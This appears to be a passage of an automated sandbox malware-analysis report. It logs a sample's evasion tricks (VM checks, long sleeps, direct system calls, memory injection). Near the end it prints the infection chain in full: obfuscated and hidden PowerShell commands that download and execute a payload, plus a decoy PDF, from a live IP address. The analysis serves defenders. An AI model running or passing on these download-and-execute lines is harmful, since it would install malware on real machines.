                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      barindex
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeAPI/Special instruction interceptor: Address: 7FFE2220D044
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeAPI/Special instruction interceptor: Address: 7FFE2220D044
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeAPI/Special instruction interceptor: Address: 58AB83A
                      Source: 123123213123123321132.exe, 00000013.00000002.2154423067.0000000000674000.00000040.00000001.01000000.00000014.sdmp, 123123213123123321132.exe, 00000013.00000002.2155178518.0000000000CB9000.00000040.00001000.00020000.00000000.sdmp, 123123213123123321132.exe, 0000001A.00000003.2123313001.00000000007B9000.00000040.00000400.00020000.00000000.sdmp, 123123213123123321132.exe, 0000001A.00000003.2119310609.00000000007B9000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: ORIGINALFILENAMECFF EXPLORER.EXE:
                      Source: 123123213123123321132.exeBinary or memory string: CFF EXPLORER.EXE
                      Source: 123123213123123321132.exe, 00000013.00000002.2154423067.0000000000674000.00000040.00000001.01000000.00000014.sdmp, 123123213123123321132.exe, 00000013.00000002.2155178518.0000000000CB9000.00000040.00001000.00020000.00000000.sdmp, 123123213123123321132.exe, 0000001A.00000003.2123313001.00000000007B9000.00000040.00000400.00020000.00000000.sdmp, 123123213123123321132.exe, 0000001A.00000003.2119310609.00000000007B9000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: INTERNALNAMECFF EXPLORER.EXE
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3300Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6546Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5007Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4640Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeDropped PE file which has not been started: C:\Users\user\Videos\DiskTuner\Bin\DiskTuner.exeJump to dropped file
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeAPI coverage: 0.4 %
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5172Thread sleep count: 3300 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3512Thread sleep count: 6546 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7172Thread sleep time: -12912720851596678s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7200Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7336Thread sleep count: 5007 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7348Thread sleep count: 4640 > 30Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7388Thread sleep time: -12912720851596678s >= -30000sJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7404Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\System32\svchost.exe TID: 7716Thread sleep time: -30000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: powershell.exe, 00000005.00000002.1908641173.000002110509C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tEventVmNetworkAdapter',
                      Source: powershell.exe, 00000005.00000002.1908641173.000002110509C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'Remove-NetEventVmNetworkAdapter',
                      Source: powershell.exe, 00000005.00000002.1908641173.0000021103F63000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
                      Source: powershell.exe, 00000005.00000002.1908641173.000002110509C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapterX
                      Source: powershell.exe, 00000002.00000002.1771531656.00000231FACD5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllZ
                      Source: powershell.exe, 00000005.00000002.2045901533.000002111BBDD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                      Source: powershell.exe, 00000005.00000002.1908641173.000002110509C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapterX
                      Source: powershell.exe, 00000005.00000002.1908641173.000002110509C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: +MSFT_NetEventVmNetworkAdatper.format.ps1xmlX
                      Source: powershell.exe, 00000005.00000002.1908641173.000002110509C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapterX
                      Source: svchost.exe, 00000007.00000002.2906704863.0000016AA1658000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000007.00000002.2905223769.0000016AA022B000.00000004.00000020.00020000.00000000.sdmp, fontdrvhost.exe, 0000001B.00000002.2231192401.00000000034FE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                      Source: powershell.exe, 00000005.00000002.1908641173.000002110509C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: #MSFT_NetEventVmNetworkAdatper.cdxmlX
                      Source: powershell.exe, 00000005.00000002.1908641173.000002110509C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'Add-NetEventVmNetworkAdapter',
                      Source: fontdrvhost.exe, 0000001B.00000002.2231192401.00000000034AB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWX|M
                      Source: powershell.exe, 00000005.00000002.1908641173.0000021103F63000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
                      Source: powershell.exe, 00000005.00000002.2045901533.000002111BB80000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 00000006.00000003.1799931253.00000180CF255000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 00000006.00000002.1888112855.00000180CF255000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: powershell.exe, 00000005.00000002.1908641173.000002110509C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'MSFT_NetEventVmNetworkAdatper.cdxml',
                      Source: fontdrvhost.exe, 0000001B.00000002.2231192401.00000000034AB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW {M
                      Source: powershell.exe, 00000005.00000002.1908641173.0000021103F63000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
                      Source: powershell.exe, 00000005.00000002.2050241455.000002111BC91000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: War&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
                      Source: fontdrvhost.exe, 0000001B.00000003.2128311163.00000000055E0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: DisableGuestVmNetworkConnectivity
                      Source: powershell.exe, 00000002.00000002.1771531656.00000231FAD03000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\DosDevices\D:
                      Source: powershell.exe, 00000002.00000002.1770651654.00000231FAA76000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}y
                      Source: fontdrvhost.exe, 0000001B.00000003.2128311163.00000000055E0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: EnableGuestVmNetworkConnectivity
                      Source: powershell.exe, 00000005.00000002.1908641173.000002110509C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'Get-NetEventVmNetworkAdapter',
                      Source: powershell.exe, 00000005.00000002.1908641173.000002110509C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: 'MSFT_NetEventVmNetworkAdatper.format.ps1xml',
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeCode function: 26_3_007A9098 VirtualAlloc,LdrInitializeThunk,VirtualFree,26_3_007A9098
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeCode function: 19_2_004D7960 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,19_2_004D7960
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeCode function: 26_3_007A9277 mov eax, dword ptr fs:[00000030h]26_3_007A9277
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeCode function: 27_3_03220283 mov eax, dword ptr fs:[00000030h]27_3_03220283
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeCode function: 19_2_0052B440 GetProcessHeap,HeapAlloc,19_2_0052B440
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeProcess created: C:\Users\user\AppData\Local\Temp\123123213123123321132.exe "C:\Users\user\AppData\Local\Temp\123123213123123321132.exe"

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeNtQueryInformationToken: Direct from: 0xCF36FF
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeNtOpenKeyEx: Direct from: 0xCF6738
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeNtQuerySystemInformation: Direct from: 0x8FFF60
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeNtProtectVirtualMemory: Direct from: 0xCF8A56
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeNtResumeThread: Direct from: 0xE85A9C
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeNtReadVirtualMemory: Direct from: 0xE857B8
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeNtQueryInformationProcess: Direct from: 0x79C578
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeNtQuerySystemInformation: Direct from: 0x7FFE221E4B5E
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeNtReadVirtualMemory: Direct from: 0xE85807
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeNtSetInformationFile: Direct from: 0xCF7A4B
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeNtReadFile: Direct from: 0xE84AED
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeNtAllocateVirtualMemory: Direct from: 0x7A90C3
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeNtProtectVirtualMemory: Direct from: 0xE85644
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeNtProtectVirtualMemory: Direct from: 0xCFB465
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeNtAllocateVirtualMemory: Direct from: 0x7A178F
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeNtProtectVirtualMemory: Direct from: 0x76EF7B2E
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeNtWriteVirtualMemory: Direct from: 0xE85A4A
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeNtAllocateVirtualMemory: Direct from: 0xE84D9D
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeNtAllocateVirtualMemory: Direct from: 0x7A9317
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeNtQueryInformationProcess: Direct from: 0xCFB2C4
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeNtQuerySystemInformation: Direct from: 0xCF5531
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeNtProtectVirtualMemory: Direct from: 0xE8631A
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeNtSetValueKey: Direct from: 0xCF67DF
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeNtProtectVirtualMemory: Direct from: 0xCF8096
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeNtAllocateVirtualMemory: Direct from: 0xCF1A78
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeNtQuerySystemInformation: Direct from: 0xCF775C
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeNtProtectVirtualMemory: Direct from: 0xE85BC5
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeNtProtectVirtualMemory: Direct from: 0xE85A0C
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeNtMapViewOfSection: Direct from: 0xCF6A0B
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeNtCreateKey: Direct from: 0xCF6753
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeNtAllocateVirtualMemory: Direct from: 0xCF7765
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeNtQueryInformationProcess: Direct from: 0xE856F2
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeNtAllocateVirtualMemory: Direct from: 0xE858F1
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeNtProtectVirtualMemory: Direct from: 0xE8597A
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeNtAllocateVirtualMemory: Direct from: 0x7A9369
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeNtCreateFile: Direct from: 0xCF7924
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeNtProtectVirtualMemory: Direct from: 0xE85CDA
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeNtCreateMutant: Direct from: 0xCF7098
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeNtSetInformationThread: Direct from: 0x76EF63F9
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeNtProtectVirtualMemory: Direct from: 0xE85A83
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeNtSetInformationProcess: Direct from: 0x79BCCD
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeNtQueryInformationProcess: Direct from: 0xCF77C0
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeNtQueryInformationProcess: Direct from: 0xCF784A
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeNtProtectVirtualMemory: Direct from: 0xCFB440
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeNtProtectVirtualMemory: Direct from: 0x7A93C3
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeNtSetInformationProcess: Direct from: 0xCF67F8
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeNtOpenFile: Direct from: 0xE84CF0
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeNtQuerySystemInformation: Direct from: 0x8000
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeNtWriteVirtualMemory: Direct from: 0xE8592C
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeNtSetInformationProcess: Direct from: 0xCF8A44
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeNtQuerySystemInformation: Direct from: 0xCF70F8
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeNtAllocateVirtualMemory: Direct from: 0xCF52CD
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeNtProtectVirtualMemory: Direct from: 0xE85690
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeNtAllocateVirtualMemory: Direct from: 0xCF42C1
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeNtQuerySystemInformation: Direct from: 0xCF5552
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeNtClose: Direct from: 0xE84F33
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeNtQueryInformationProcess: Direct from: 0xCF51F5
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeNtQuerySystemInformation: Direct from: 0x76EF63E1
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeNtAllocateVirtualMemory: Direct from: 0xE84E60
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeNtQuerySystemInformation: Direct from: 0xCFB8AB
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeNtReadVirtualMemory: Direct from: 0xE85778
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeNtQuerySystemInformation: Direct from: 0xCF777F
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeNtQueryValueKey: Direct from: 0x7A3D77
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeNtProtectVirtualMemory: Direct from: 0x76EF6432
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeNtReadVirtualMemory: Direct from: 0xE85731
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeNtProtectVirtualMemory: Direct from: 0xE862BF
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeMemory written: C:\Users\user\AppData\Local\Temp\123123213123123321132.exe base: 770000 value starts with: 4D5A
                      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeSection loaded: NULL target: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\identity_helper.exe protection: readonlyJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOweRsHeLL -c set-alias FeRR iWr ; sal NetaeX iEx ; NetaeX(FeRR http://95.169.201.100:18956/api/secure/116887b2ac34a05784dca6f2cac7cc03)Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\loader.bat" "Jump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle Hidden -Command "IWR -Uri "http://95.169.201.100:18960/uploads/team-1/readme.pdf" -OutFile "$env:temp\readme.pdf" ; Start-Process 'msedge.exe' -ArgumentList \"--kiosk $env:temp\readme.pdf\" ; IWR -Uri "http://95.169.201.100:18960/uploads/team-1/readme.exe" -OutFile "$env:temp\123123213123123321132.exe" ; start "$env:temp\123123213123123321132.exe""Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --kiosk C:\Users\user\AppData\Local\Temp\readme.pdf Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\123123213123123321132.exe "C:\Users\user\AppData\Local\Temp\123123213123123321132.exe" Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\123123213123123321132.exeProcess created: C:\Windows\SysWOW64\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeProcess created: C:\Windows\System32\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -windowstyle hidden -command "iwr -uri "http://95.169.201.100:18960/uploads/team-1/readme.pdf" -outfile "$env:temp\readme.pdf" ; start-process 'msedge.exe' -argumentlist \"--kiosk $env:temp\readme.pdf\" ; iwr -uri "http://95.169.201.100:18960/uploads/team-1/readme.exe" -outfile "$env:temp\123123213123123321132.exe" ; start "$env:temp\123123213123123321132.exe""
